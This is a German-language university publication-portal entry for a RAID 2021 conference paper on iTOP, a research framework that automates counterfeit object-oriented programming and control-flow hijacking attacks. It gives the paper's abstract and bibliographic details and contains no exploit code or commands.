ITOP: Automating counterfeit object-oriented programming attacks

Paul Muntean, Richard Viehoever, Zhiqiang Lin, Gang Tan, Jens Grossklags, Claudia Eckert

Publikation: Beitrag in Buch/Bericht/KonferenzbandKonferenzbeitragBegutachtung

1 Zitat (Scopus)

Abstract

Exploiting a program requires a security analyst to manipulate data in program memory with the goal to obtain control over the program counter and to escalate privileges. However, this is a tedious and lengthy process as: (1) the analyst has to massage program data such that a logical reliable data passing chain can be established, and (2) depending on the attacker goal certain in-place fine-grained protection mechanisms need to be bypassed. Previous work has proposed various techniques to facilitate exploit development. Unfortunately, none of them can be easily used to address the given challenges. This is due to the fact that data in memory is difficult to be massaged by an analyst who does not know the peculiarities of the program as the attack specification is most of the time only textually available, and not automated at all. In this paper, we present indirect transfer oriented programming (iTOP), a framework to automate the construction of control-flow hijacking attacks in the presence of strong protections including control flow integrity, data execution prevention, and stack canaries. Given a vulnerable program, iTOP automatically builds an exploit payload with a chain of viable gadgets with solved SMT-based memory constraints. One salient feature of iTOP is that it contains 13 attack primitives powered by a Turing complete payload specification language, ESL. It also combines virtual and non-virtual gadgets using COOP-like dispatchers. As such, when searching for gadget chains, iTOP can respect, for example, a previously enforced CFI policy, by using only legitimate control flow transfers. We have evaluated iTOP with a variety of programs and demonstrated that it can successfully generate exploits with the developed attack primitives.

OriginalspracheEnglisch
TitelProceedings of 2021 24th International Symposium on Research in Attacks, Intrusions and Defenses, RAID 2021
Herausgeber (Verlag)Association for Computing Machinery
Seiten162-176
Seitenumfang15
ISBN (elektronisch)9781450390583
DOIs
PublikationsstatusVeröffentlicht - 6 Okt. 2021
Veranstaltung24th International Symposium on Research in Attacks, Intrusions and Defenses, RAID 2021 - Virtual, Online, Spanien
Dauer: 6 Okt. 20218 Okt. 2021

Publikationsreihe

NameACM International Conference Proceeding Series

Konferenz

Konferenz24th International Symposium on Research in Attacks, Intrusions and Defenses, RAID 2021
Land/GebietSpanien
OrtVirtual, Online
Zeitraum6/10/218/10/21

Fingerprint

Untersuchen Sie die Forschungsthemen von „ITOP: Automating counterfeit object-oriented programming attacks“. Zusammen bilden sie einen einzigartigen Fingerprint.

Dieses zitieren